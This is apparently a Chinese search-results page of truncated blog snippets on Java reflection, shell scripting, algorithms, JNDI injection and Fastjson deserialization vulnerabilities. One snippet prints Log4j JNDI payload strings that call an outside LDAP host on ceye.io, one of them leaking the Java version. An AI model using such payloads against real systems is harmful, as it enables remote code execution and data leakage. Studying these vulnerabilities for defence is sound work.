序列fastjson恶意shell

基础知识 1. Java 反射 1.1 getConstructor getConstructor 是Java反射API中的一个方法，用于获取类的公共构造方法的引用。构造方法是一种特殊的方法，用于创建类的实例（对象），并且通常在对象创建时进行初始化。 getConstructor的函数原型： pub ......

Oracle Linux-Shell Script to Calculate Values Recommended Linux HugePages-HugeTLB Configuration_DocID401749.1 ######################################## ......

Unmarshal 解析 func Unmarshal(data []byte, v any) error Unmarshal 解析 JSON 编码的数据，并将结果存储在 v 指向的值中。如果 v 为 nil 或不是指针，Unmarshal 返回一个 InvalidUnmarshalError 错误 ......

示例1 function _xwjh() { local cur prev opts COMPREPLY=() cur="${COMP_WORDS[COMP_CWORD]}" prev="${COMP_WORDS[COMP_CWORD-1]}" # opts="gen init start dele ......

进入hbase之前要启动zk hadoop hbase # 启动ZK ./start-zk.sh 我启动zk的路径为：/export/server/zookeeper/bin/zkServer.sh start 三台虚拟机都要启动 # 启动hadoop start-all.sh # 启动hbase ......

默认的情况下，Shell脚本中的命令是串行执行，必须等到前一条命令执行完后才执行接下来的命令，但是如果有一大批命令需要执行，而且互相又没有影响的情况下，那么就要使用并发的方式执行命令了。 因为Shell本身并不提供多线程机制，因此需要借助其他技术（如有名管道）来实现多线程的通信。 后台执行实现并发 ......

最长公共子序列 定义 最长公共子序列（LCS）是一个在一个序列集合中（通常为两个序列）用来查找所有序列中最长子序列的问题。 ——维基百科 这里的子序列，是可以不连续的。 比如： 1 2 3 1 2 4 2 3 2 1 5 2 1 2 他们的最长公共子序列就是 2 1 2 2。 也就是从两个序列，分别 ......

业界微步和vt沙箱样本分析： https://s.threatbook.com/report/file/376255ae3f745766ad2a3250c933467cdc3cff886b759bc3e1f656ddf4171433 https://www.virustotal.com/gui/fi ......

JNDI注入 什么是JNDI JNDI全称为 Java Naming and Directory Interface（Java命名和目录接口），是一组应用程序接口，为开发人员查找和访问各种资源提供了统一的通用接口，可以用来定义用户、网络、机器、对象和服务等各种资源。 JNDI支持的服务主要有：DNS ......

1.在makefile中，想要直接导入shell脚本的环境变量是有点麻烦，因为source命令导出的变量只在当前终端有效，而且source命令和.命令是等价的,如下： source ./env.sh . ./env 通常我们拿到SDK交叉编译链，都会先解压工具链，在source一下工具链中的环境变量 ......

shell脚本中的变量 局部变量 local 修饰，作用域在函数里，当出现同名变量优先级高于外部全局变量 全局变量 全局变量，不加任何修饰符，一般用于定义常量，任何函数体里都可以直接去取全局变量的值 ......

1.case语句 可以实现switch case的逻辑 case $server_vendor in "HP"|"Hewlett-Packard") install_rpm "HP" hp_server_hardware_health_check ;; *) install_rpm "Other" ......

一、mkdir 创建文件夹通过命令hadoop fs -mkdir /cyw在hdfs中创建名为cyw的文件夹 二、moveFromLocal从本地剪切到hdfs中 这里将本地/home/input/movefromlocal文件剪切到hdfs的cyw文件夹下hadoop fs -moveFromL ......

题目链接： 剑指 Offer 57 - II. 和为s的连续正数序列 题目描述： 输入一个正整数 target ，输出所有和为 target 的连续正整数序列（至少含有两个数）。 序列内的数字由小到大排列，不同序列按照首个数字从小到大排列。 解法思路： 双指针： 当总和小于 target 时，j 指 ......

题目链接 description 给定一个质数 \(m\)，以及 \(n,x\) 和集合 \(S\)。从集合 \(S\) 中任意选数构成长度为 \(n\) 的数列（一个数可以选多次），求数列元素乘积模 \(m\) 等于 \(x\) 的数列的数量。模 \(1004535809\)。 \(3\leq m ......

[HNOI2016] 序列 题解：\(ST\)表 + 莫队 设莫队维护区间\([l,r]\)的答案\(ans\)，我们考虑右端点\(r\)向右扩张时\(r:=r+1\)对\(ans\)的影响，设\(min[l,r]\)代表区间\([l,r]\)中的最小值 \(ans :=ans+min[r,r]+m ......

491. 递增子序列 ......

#!/bin/shecho “正在获取git最新代码,请输入正确的用户名与密码”output=git pull origin mastera=$?b=0if [ $a = $b ]; thenecho “代码拉取成功，正在执行打包”mvn clean && mvn compile && mvn in ......

1.创建元组： a=('a',2009) //与列表不同，用圆括号 a=() a=(20,) //当元组中只包含一个元素的时候，需要在元素后加逗号，不然括号会被当成运算符 2.元组访问： a[1] a[2:5] //也可以用切片 也可以用for的遍历。 3.修改元组： 元组不允许修改。修改要通过对元 ......

1.列表的创建： a=['hallo','guten',[2002,2223]] empty_list=[] 2.获得列表长度： len(a) 3.创建数值列表: a=list(range (1,6)) //1到6的列表 b=list(range(1,11,2)) //1到10的奇数列表 c=lis ......

#!/bin/shecho “正在获取git最新代码,请输入正确的用户名与密码”output=git pull origin mastera=$?b=0if [ $a = $b ]; thenecho “代码拉取成功，正在执行打包”mvn clean && mvn compile && mvn in ......

全文链接：http://tecdat.cn/?p=32496 原文出处：拓端数据部落公众号 人口流动与迁移，作为人类产生以来就存在的一种社会现象，伴随着人类文明的不断进步从未间断。 人力资源是社会文明进步、人民富裕幸福、国家繁荣昌盛的核心推动力量。当前，我国经济正处于从以政府主导的投资驱动型的经济“ ......

更新一下笔记中JAVA的几个知名的反序列化漏洞，仅漏洞poc和原理，无分析过程。 # Log4j 条件：出网（因为需要请求jndi服务器） ``` ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a. ......

[toc] # Fastjson_1.2.47_rce | 说明 | 内容 | | | | | 漏洞编号 | | | 漏洞名称 | Fastjson_1.2.47_远程执行漏洞 | | 漏洞评级 | | | 影响范围 | | | 漏洞描述 | | | 修复方案 | | ### 1.1、漏洞描述 Fa ......

[toc] # fastjson 1.2.24 反序列化导致任意命令执行漏洞 | 说明 | 内容 | | | | | 漏洞编号 | | | 漏洞名称 | fastjson 1.2.24 反序列化导致任意命令执行漏洞 | | 漏洞评级 | | | 影响范围 | | | 漏洞描述 | | | 修复方案 ......

base64 加密fk=$(echo ${str} | openssl base64) echo ${fk} 解密 jfk=$(echo ${fk} | openssl base64 -d) echo ${jfk} md5 加密，一次盐值fk2=$(echo -n ${str} | md5sum) ......

Linux shell 环境变量 All In One 全局环境变量，system wide environment 系统级环境变量 局部环境变量，local wide environment 用户自定义环境变量 ......

`2023-07-19 20:07:13` (双倍经验:CF452F Permutation) ## 前言 这篇题解的代码与大部分代码用的正反做哈希不太一样，是倒数组做哈希的，希望可以给跟我方法相似但是代码挂了的同学一点启发。 ## 自己的想法 由等差数列基本性质，我们只要找到任意三个数满足 $a[ ......

## [C. Game on Permutation](https://codeforces.com/contest/1860/problem/C) 这道题需要求出**先手必胜**点 通过分析可知，每个位置结尾的最大上升子序列长度为**2**的点为先手必胜点，**≥3**的点为先手必败点。即只需要求 ......

比如如下json字符串，而且此字符串的键值是不定而且是有变化的 var jsonString={"BillDate":1,"TypeName":0,"StepNum":0,"CollectCode":0,"Uncollected":1,"Tax":0,"AbstractInfo":1} 现在我们要对 ......